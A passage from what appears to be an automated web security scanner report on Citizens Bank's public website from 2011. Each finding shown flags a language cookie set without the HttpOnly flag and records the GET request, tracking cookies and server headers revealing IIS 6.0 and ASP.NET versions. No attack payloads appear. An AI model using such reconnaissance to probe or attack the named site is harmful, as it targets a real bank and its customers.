The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home-equity/find-your-fit.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 02 Feb 2011 22:17:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.citizensbank.com/home-equity/help-me-choose-home-equity.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Length: 0


11.549. http://www.citizensbank.com/home-equity/lines.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /home-equity/lines.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home-equity/lines.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:31 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 45072


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.550. http://www.citizensbank.com/home-equity/loans.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /home-equity/loans.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home-equity/loans.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:20 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 44294


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.551. http://www.citizensbank.com/investing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /investing/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /investing/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:02 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 44667


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.552. http://www.citizensbank.com/loans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /loans/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loans/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:17 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 39896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.553. http://www.citizensbank.com/loans/compare.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /loans/compare.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loans/compare.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:15 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 32240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.554. http://www.citizensbank.com/loans/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /loans/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loans/default.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:17 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 41632


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.555. http://www.citizensbank.com/loans/home-equity.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /loans/home-equity.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loans/home-equity.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:16 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 22861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl0
...[SNIP]...

11.556. http://www.citizensbank.com/moneyhelp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /moneyhelp/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /moneyhelp/?WT.ac=moneyhelp HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:22 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19797


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.557. http://www.citizensbank.com/mortgages/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /mortgages/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgages/ HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:32 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 50083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.558. http://www.citizensbank.com/mortgages/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /mortgages/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgages/default.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:21 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 50083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.559. http://www.citizensbank.com/mortgages/home-refinance.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /mortgages/home-refinance.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgages/home-refinance.aspx?WT.ac=refinance HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:32 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 20706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.560. http://www.citizensbank.com/mortgages/overview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /mortgages/overview.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mortgages/overview.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:25 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 22758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl0
...[SNIP]...

11.561. http://www.citizensbank.com/online-banking/faq.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /online-banking/faq.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online-banking/faq.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:17 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 59861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.562. http://www.citizensbank.com/online-banking/mobile-banking/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /online-banking/mobile-banking/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online-banking/mobile-banking/default.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:17:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fonline-banking%2fmobile-banking%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 212

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fonline-banking%252fmobile-banking%252fdefault.aspx">here</a>.</h2>
</bo
...[SNIP]...

11.563. http://www.citizensbank.com/online-banking/olbdemo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /online-banking/olbdemo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online-banking/olbdemo.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:28 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 17036


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.564. http://www.citizensbank.com/open-account.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /open-account.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /open-account.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:16:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fopen-account.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 179

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fopen-account.aspx">here</a>.</h2>
</body></html>

11.565. http://www.citizensbank.com/personal-investing/overview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /personal-investing/overview.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal-investing/overview.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 02 Feb 2011 22:18:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.citizensbank.com/personal-investing/default.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Length: 0


11.566. http://www.citizensbank.com/savings-and-cds/cds.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /savings-and-cds/cds.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings-and-cds/cds.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:03 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 33846


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.567. http://www.citizensbank.com/savings-and-cds/college-saver.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /savings-and-cds/college-saver.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings-and-cds/college-saver.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:49:06 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 35701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.568. http://www.citizensbank.com/savings-and-cds/goaltrack-savings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /savings-and-cds/goaltrack-savings.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings-and-cds/goaltrack-savings.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:11 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 44060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...

11.569. http://www.citizensbank.com/savings-and-cds/homebuyer-savings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /savings-and-cds/homebuyer-savings.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /savings-and-cds/homebuyer-savings.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
